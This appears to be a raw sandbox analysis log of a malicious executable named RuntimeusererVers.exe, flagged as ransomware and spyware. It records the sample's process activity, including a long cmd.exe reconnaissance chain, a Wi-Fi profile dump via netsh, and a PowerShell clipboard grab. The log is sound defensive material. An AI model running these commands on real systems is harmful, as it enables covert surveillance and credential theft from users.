                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.variomedia.de/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233425C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zopeinterface.readthedocs.io/en/latest/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EIVQSAOTAQ.pngJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SQSJKEBWDT.pngJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SUAVTZKNFL.docxJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PIVFAGEAAV.pdfJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile deleted: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\KLIZUSIQEN.mp3Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC9C6D048_2_00007FF81DC9C6D0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC9B2C048_2_00007FF81DC9B2C0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC966F048_2_00007FF81DC966F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC9E25048_2_00007FF81DC9E250
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DCA3A5048_2_00007FF81DCA3A50
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC8324048_2_00007FF81DC83240
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DCA2A7048_2_00007FF81DCA2A70
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC83A0048_2_00007FF81DC83A00
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC95DD048_2_00007FF81DC95DD0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC8C55048_2_00007FF81DC8C550
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC9CD5048_2_00007FF81DC9CD50
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC8414048_2_00007FF81DC84140
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC9B97048_2_00007FF81DC9B970
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC9F57048_2_00007FF81DC9F570
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081DD448_2_00007FF81E081DD4
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08257248_2_00007FF81E082572
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0E846048_2_00007FF81E0E8460
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08195B48_2_00007FF81E08195B
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0D024048_2_00007FF81E0D0240
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E13895848_2_00007FF81E138958
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E4E18A048_2_00007FF81E4E18A0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF7BDB9554153_2_00007FF7BDB95541
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEF66F058_2_00007FF81DEF66F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEFC6D058_2_00007FF81DEFC6D0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEFB2C058_2_00007FF81DEFB2C0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF02A7058_2_00007FF81DF02A70
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEFE25058_2_00007FF81DEFE250
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF03A5058_2_00007FF81DF03A50
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEE324058_2_00007FF81DEE3240
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF253B058_2_00007FF81DF253B0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEE3A0058_2_00007FF81DEE3A00
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEF5DD058_2_00007FF81DEF5DD0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEFB97058_2_00007FF81DEFB970
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEFF57058_2_00007FF81DEFF570
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEEC55058_2_00007FF81DEEC550
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEFCD5058_2_00007FF81DEFCD50
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEE414058_2_00007FF81DEE4140
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF008F058_2_00007FF81DF008F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEE1CE058_2_00007FF81DEE1CE0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF034C058_2_00007FF81DF034C0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DEF54B058_2_00007FF81DEF54B0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC81B9058_2_00007FF81EC81B90
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC8100058_2_00007FF81EC81000
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC9EBC458_2_00007FF81EC9EBC4
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: String function: 00007FF81E0EDFBF appears 34 times
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: String function: 00007FF81E0812EE appears 136 times
                      Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: _overlapped.pyd.37.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: unicodedata.pyd.37.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: _overlapped.pyd.55.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: python3.dll.0.drStatic PE information: No import functions for PE file found
                      Source: python3.dll.37.drStatic PE information: No import functions for PE file found
                      Source: python3.dll.55.drStatic PE information: No import functions for PE file found
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6E8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exeBinary or memory string: OriginalFilename vs RuntimeusererVers.exe
                      Source: RuntimeusererVers.exeBinary or memory string: OriginalFilename vs RuntimeusererVers.exe
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: Commandline size = 3647
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: Commandline size = 3647Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                      Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@113/224@5/7
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeMutant created: \Sessions\1\BaseNamedObjects\X
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942Jump to behavior
                      Source: RuntimeusererVers.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile read: C:\Users\desktop.ini
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: RuntimeusererVers.exeReversingLabs: Detection: 39%
                      Source: RuntimeusererVers.exeString found in binary or memory: %lu.%lu.%lu.%lu.in-addr.arpa
                      Source: RuntimeusererVers.exeString found in binary or memory: can't send non-None value to a just-started generator
                      Source: RuntimeusererVers.exeString found in binary or memory: %lu.%lu.%lu.%lu.in-addr.arpa
                      Source: RuntimeusererVers.exeString found in binary or memory: can't send non-None value to a just-started generator
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile read: C:\Users\user\Desktop\RuntimeusererVers.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
